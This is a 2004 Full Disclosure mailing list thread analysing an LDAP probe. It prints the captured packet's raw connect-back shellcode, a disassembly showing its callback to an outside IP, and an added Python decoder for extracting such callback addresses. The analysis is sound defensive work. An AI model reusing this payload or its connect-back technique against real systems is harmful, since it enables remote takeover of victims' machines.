Full Disclosure mailing list archives

(no subject)


From: "Disclosure From OSSI" <disclosure () ossecurity ca>
Date: Thu, 26 Feb 2004 00:13:28 -0500

We grabbed the binary data from the sniffed capture below. After a quick reverse,
it turns out to be a connect-back shellcode with the back server p->
24.19.147.225.

Partially disassembled:
00000084 68 18 13 93 E1                          push    0E1931318h
00000089 68 02 00 22 E4                          push    0E4220002h
0000008E 8B CC                                   mov     ecx, esp
00000090 6A 10                                   push    10h
00000092 51                                      push    ecx
00000093 FF 76 24                                push    dword ptr [esi+24h]
00000096 FF D0                                   call    eax

 = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
The following info was automatically generated by "OSAnalyzer" program.
 = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

      call  eax=776ba5a3
      776ba5a3 = WS2_32.dll!connect with para 3
      Para 0 is socket # 00000094
      Para 1 is name p-> 00dafcc4
      Para 2 is namelen  00000010
      sin_family AF_INET     , port 8932 IP 24.19.147.225
      call external 776ba5a3 stack 0000000c return ffffffff

; =================== a quick translation =================================
C:\TEMP>ping -a 24.19.147.225

Pinging c-24-19-147-225.client.comcast.net [24.19.147.225] with 32 bytes of data

Hope the info is useful to you.

Regards

Peter Huang
Peter.Huang AT ossecurity.ca
http://www.ossecurity.ca/
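To show how the target above is recovered from the two pushes in the disassembly, here is an added example (not from Peter's post and not OSAnalyzer code) that decodes the pushed sockaddr_in and scans a byte string for such push pairs; the 12-byte sample is constructed from the listing at offsets 0x84-0x8E, not taken from the raw capture.

```python
# Added example: recover the connect-back target that a Win32 shellcode
# builds on the stack with two "push imm32" instructions before calling
# WS2_32!connect. Constructed from the disassembly in the post, not the
# raw (XOR-encoded) capture.
import socket
import struct

SAMPLE = bytes.fromhex("68 18 13 93 E1"   # push 0E1931318h  (sin_addr)
                       "68 02 00 22 E4"   # push 0E4220002h  (sin_family, sin_port)
                       "8B CC")           # mov ecx, esp    (ecx -> sockaddr_in)


def decode_sockaddr_pushes(addr_imm: int, family_port_imm: int):
    """Decode the two dwords a shellcode pushes to build a sockaddr_in.

    The dword pushed last lies at the lowest address, so it holds
    sin_family (little-endian word) followed by sin_port (network order).
    The dword pushed first holds sin_addr, already in network order.
    """
    fam_port = struct.pack("<I", family_port_imm)   # bytes as they lie in memory
    family = struct.unpack("<H", fam_port[:2])[0]
    port = struct.unpack("!H", fam_port[2:])[0]
    ip = socket.inet_ntoa(struct.pack("<I", addr_imm))
    return family, port, ip


def find_connect_back_targets(code: bytes):
    """Scan decoded shellcode for 'push imm32; push imm32' pairs whose
    second immediate starts with AF_INET (2) and report port and IP.
    Useful for pulling the callback address out for blocking/alerting."""
    hits = []
    for i in range(len(code) - 9):
        if code[i] != 0x68 or code[i + 5] != 0x68:
            continue
        addr_imm = struct.unpack_from("<I", code, i + 1)[0]
        fp_imm = struct.unpack_from("<I", code, i + 6)[0]
        family, port, ip = decode_sockaddr_pushes(addr_imm, fp_imm)
        if family == socket.AF_INET and port != 0:
            hits.append({"offset": i, "port": port, "ip": ip})
    return hits


if __name__ == "__main__":
    print(find_connect_back_targets(SAMPLE))
```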

Date: Wed, 25 Feb 2004 08:46:26 -0800
From: John Sage <jsage () finchhaven com>
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Probes on port 389

Just picked this up:

On Tue, Feb 24, 2004 at 11:06:50AM -0600, Schmehl, Paul L wrote:
From: "Schmehl, Paul L" <pauls () utdallas edu>
To: <intrusion () sans org>, <full-disclosure () lists netsys com>
Subject: [Full-disclosure] Probes on port 389
Date: Tue, 24 Feb 2004 11:06:50 -0600

I threw up a quick rule on snort to monitor probes on port 389 because I
have been seeing entries in /var/log/messages on some boxes that I am
responsible for.  This morning we had a probe that hit 26205 different
IPs on that port in about 7 minutes (SYN scan only - no payload.)  The
source IP was a mailserver in England.  (They've been notified.)

/* snip */

input: snort.log.1077660886
filter: ip and ( src host 24.6.176.211 )
#
T 2004/02/25 08:08:15.042588 24.6.176.211:220 -> 24.19.147.xxx:389 [S]
#
T 2004/02/25 08:08:15.092297 24.6.176.211:220 -> 24.19.147.xxx:389 [R]
#
T 2004/02/25 08:08:15.097128 24.6.176.211:2211 -> 24.19.147.xxx:389 [S]
#
T 2004/02/25 08:08:15.146174 24.6.176.211:2211 -> 24.19.147.xxx:389 [A]
#
T 2004/02/25 08:08:15.154158 24.6.176.211:2211 -> 24.19.147.xxx:389 [A]
  30 82 0a 3d 02 01 01 60    82 01 36 02 ff ff ff ff    0..=...`..6.....
  50 a9 f7 00 10 13 90 90    90 90 90 90 90 90 90 90    P...............
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
  90 90 90 90 90 90 90 90    90 eb 02 eb 05 e8 f9 ff    ................
  ff ff 5b 80 c3 10 33 c9    66 b9 33 01 80 33 95 43    ..[...3.f.3..3.C
  e2 fa 14 79 05 94 95 95    1e 61 c0 c3 f1 34 a5 95    ...y.....a...4..
  95 95 1e d5 99 1e e5 89    38 1e fd 9d 7e 95 1e 50    ........8...~..P
  cb c8 1c 93 6a a3 fd 1b    db 9b 79 7d 38 95 95 95    ....j.....y}8...
  fd a6 a7 95 95 fd e2 e6    a7 ca c1 6a 45 1e 6d c2    ...........jE.m.
  fd 4c 9c 60 38 7d 06 95    95 95 a6 5c c4 c4 c4 c4    .L.`8}.....\....
  d4 c4 d4 c4 6a 45 1c d3    b1 c2 fd 79 6c 3f f5 7d    ....jE.....yl?.}
  ec 95 95 95 fd 8d 86 06    74 fd 97 95 b7 71 1e 59    ........t....q.Y
  ff 85 c4 6a e3 b1 6a 45    fd f6 f8 f1 95 1c f3 a5    ...j..jE........
  6a a3 fd e7 6b 26 83 7d    c4 95 95 95 1c d3 8b 16    j...k&.}........
  79 c1 18 a9 b1 a6 55 a6    5c 16 54 80 3e 77 68 53    y.....U.\.T.>whS
  d1 b1 85 d1 6b d1 b1 a8    6b d1 b1 a9 1e d3 b1 1c    ....k...k.......
  d1 b1 dd 1c d1 b1 d9 1c    d1 b1 c5 18 d1 b1 85 c1    ................
  c5 c4 c4 c4 ff 94 c4 c4    6a e3 a5 c4 6a c3 8b 6a    ........j...j..j
  a3 fd 7a 5b 75 f5 7d 97    95 95 95 6a 45 c6 c0 c3    ..z[u.}....jE...
  c2 1e f9 b1 8d 1e d0 a9    1e c1 90 ed 96 40 1e df    .............@..
  8d 1e cf b5 96 48 76 a7    dc 1e a1 1e 96 60 a6 6a    .....Hv......`.j
  69 a6 55 39 af 51 e1 92    54 5a 98 96 6d 7e 67 ae    i.U9.Q..TZ..m~g.
  e9 b1 81 e0 74 1e cf b1    96 48 f3 1e 99 de 1e cf    ....t....H......
  89 96 48 1e 91 1e 96 50    7e 97 a6 55 1e 40 ca cb    ..H....P~..U.@..
  c8 ce 57 91 95 90 90 90    90 90 90 90 90 90 90 90    ..W.............

... deleted ...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
